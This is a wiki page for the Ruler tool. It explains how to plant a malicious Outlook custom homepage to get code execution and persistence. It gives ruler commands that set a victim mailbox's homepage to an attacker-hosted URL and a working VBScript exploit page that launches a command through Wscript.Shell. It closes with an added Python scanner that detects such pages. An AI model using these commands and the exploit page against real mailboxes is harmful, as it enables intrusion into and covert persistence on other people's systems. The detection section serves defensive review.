Homepage

Etienne Stalmans edited this page Sep 15, 2018 · 3 revisions

Ruler can get a shell through custom homepages. This is especially useful for persistence, as a homepage can lie dormant in the inbox, nearly undetectable.

The lowdown on the homepage attack is explained in the Outlook Home Page blog post.

To access the HomePage option, you need to use the homepage command. There are multiple sub-commands to homepage:

Display

You can view the current homepage value using the display command. This will display the current URL and whether it is active or not.

./ruler --email [email protected] homepage display

Add

Setting a new homepage couldn't be simpler. You use Ruler to set the new homepage to your exploit URL:

./ruler --email [email protected] homepage add --url "http://yourserver/pew.html"

The homepage attack requires your custom homepage to contain the "exploit". A basic version of this is:

<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
 Sub window_onload()
     Set Application = ViewCtl1.OutlookApplication
     Set cmd = Application.CreateObject("Wscript.Shell")
     cmd.Run("notepad")
 End Sub
-->

</script>
</head>
<body>
 <object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"></object>
</body>
</html>
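
When reviewing a page that a mailbox's homepage URL points to, the traits of the sample above can be checked statically: the Outlook View Control `<object>`, a VBScript block, access to `.OutlookApplication` and a `CreateObject` call. The Python below is an added example, not part of Ruler or the original wiki; the class, function and trait names are made up for it, and both inputs are constructed.

```python
import re
from html.parser import HTMLParser

# CLSID of the Outlook View Control, taken from the <object> tag in the sample page.
VIEW_CTL_CLSID = "0006f063-0000-0000-c000-000000000046"

class HomepageScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.has_view_ctl = False    # page embeds the Outlook View Control
        self.scripts = []            # [language, lower-cased source] per <script> block
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").lower() for k, v in attrs}
        if tag == "object" and a.get("classid", "").replace("clsid:", "") == VIEW_CTL_CLSID:
            self.has_view_ctl = True
        elif tag == "script":
            self._in_script = True
            self.scripts.append([a.get("language") or a.get("type", ""), ""])

    def handle_data(self, data):
        # Script bodies arrive here as raw text, including any <!-- --> wrapper.
        if self._in_script:
            self.scripts[-1][1] += data.lower()

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

def scan_homepage(html):
    """Return the set of traits found (trait names are made up for this example)."""
    p = HomepageScanner()
    p.feed(html)
    p.close()
    found = {"outlook-view-control"} if p.has_view_ctl else set()
    for lang, src in p.scripts:
        if "vbscript" in lang:
            found.add("vbscript")
        if re.search(r"\.\s*outlookapplication\b", src):
            found.add("outlookapplication-access")
        if re.search(r"\bcreateobject\s*\(", src):
            found.add("createobject-call")
    return found

# Constructed inputs: a trimmed, inert copy of the sample page and a harmless page.
SAMPLE = ('<script language=vbscript>\nSet Application = ViewCtl1.OutlookApplication\n'
          'Set cmd = Application.CreateObject("Wscript.Shell")\n</script>\n'
          '<object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1"></object>')
BENIGN = "<html><body><h1>Team news</h1><script>var x = 1;</script></body></html>"
```

`scan_homepage(SAMPLE)` returns all four traits and `scan_homepage(BENIGN)` returns an empty set. The checks are plain string matches, so treat a hit as a reason to look closer and a miss as inconclusive, since script can be written to avoid these exact strings.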

Delete

Deleting an existing homepage is done in a similar way to deleting rules.

./ruler --email [email protected] homepage delete

Persistence

Microsoft patched this attack by preventing the Homepage from being set remotely. Ben Wilson found that you can still use the homepage for persistence if you have access to the host. He documented this in an excellent blog post: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
